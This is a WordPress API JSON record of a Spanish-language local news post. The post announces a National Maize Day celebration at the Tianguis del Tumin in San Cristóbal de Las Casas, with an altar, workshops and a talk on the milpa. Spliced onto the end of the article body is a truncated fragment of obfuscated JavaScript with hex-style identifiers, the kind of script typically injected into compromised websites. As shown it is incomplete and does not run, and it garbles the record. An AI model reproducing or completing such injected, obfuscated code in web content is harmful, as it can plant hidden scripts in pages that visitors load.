{"id":12039,"date":"2023-09-29T11:40:17","date_gmt":"2023-09-29T11:40:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12039"},"modified":"2023-09-29T11:40:17","modified_gmt":"2023-09-29T11:40:17","slug":"conmemoran-en-sclc-dia-del-maiz","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12039","title":{"rendered":"Conmemoran en SCLC D\u00eda del Ma\u00edz"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230928-WA0287-1024x771.jpg\" alt=\"\" class=\"wp-image-12040\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230928-WA0287-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230928-WA0287-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230928-WA0287-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230928-WA0287-1536x1156.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230928-WA0287.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal&nbsp;<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas-. Este domingo primero de octubre se realizar\u00e1, durante el Tianguis del Tumin que se realizar\u00e1 en la Plazuela del Barrio de San Ram\u00f3n se har\u00e1 una conmemoraci\u00f3n del D\u00eda Nacional del Ma\u00edz, d\u00f3nde tendr\u00e1 lugar un conversatorio en torno a la milpa, informaron Tania Gonz\u00e1lez y Celia D\u00edaz.<\/p>\n\n\n\n<p>&#8220;En el Tianguis Tumin, vamos a tener una celebraci\u00f3n a partir de las 10 de la ma\u00f1ana, donde se montar\u00e1 un altar en honor al ma\u00edz, y vamos a continuar con una actividad de bordado libre, un taller de memelitas, un conversatorio que va ser s\u00faper interesante que se llama Milpa Pasado y Presente, esas ser\u00eda la mayor\u00eda de las actividades&#8221;, comentaron en entrevista.<\/p>\n\n\n\n<p>Asimismo, mencionaron que van hablar tambi\u00e9n de las t\u00e9cnicas ancestrales, de tradicones en torno al ma\u00edz, &#8220;vamos hablar sobre los retos actuales de la milpa que tiene que ver con lo econ\u00f3mico, lo pol\u00edtico, el g\u00e9nero, el acceso a las tierras, en cuanto a las mujeres y las juventudes que hay en la milpa, vamos abordar no solo el tema productivo, sino que trspasa dimensiones como el g\u00e9nero y lo pol\u00edtico, todo parte de nuestras experiencias&#8221;.<\/p>\n\n\n\n<p>&#8220;Vamos hablar de las acciones que hacen que se desplace, o la pr\u00e1ctica tradicinal de la milpa, no solo tiene que ver con el tema econ\u00f3mico, sino con el tema de acceso a las tierras, la demanda de ciertos productos que van aplazando el tema del ma\u00edz, la migraci\u00f3n por ejemplo lleva a un paulatino abandono del campo, sobre todo los j\u00f3venes migran a las ciudades&#8221;.<\/p>\n\n\n\n<p>Finalmente, informaron que van a participar unos 15 colectivos de distinta \u00edndole, sobre todo que trabajan la agroecolog\u00eda y habr\u00e1 venta de los productos Tumin y derivados del ma\u00edz que tienen que ver con la gastronom\u00eda &#8220;vamos a tener una exposici\u00f3n de mazorcas donde todos podr\u00e1n interactuar&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal&nbsp; San Crist\u00f3bal de Las Casas-. Este domingo primero de octubre se realizar\u00e1, durante el Tianguis del Tumin que se realizar\u00e1 en la Plazuela del Barrio de San Ram\u00f3n se har\u00e1 una conmemoraci\u00f3n del D\u00eda Nacional del Ma\u00edz, d\u00f3nde tendr\u00e1 lugar un conversatorio en torno a la milpa, informaron Tania Gonz\u00e1lez y Celia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12040,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12039","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12039","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12039"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12039\/revisions"}],"predecessor-version":[{"id":12041,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12039\/revisions\/12041"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12040"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12039"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12039"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12039"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}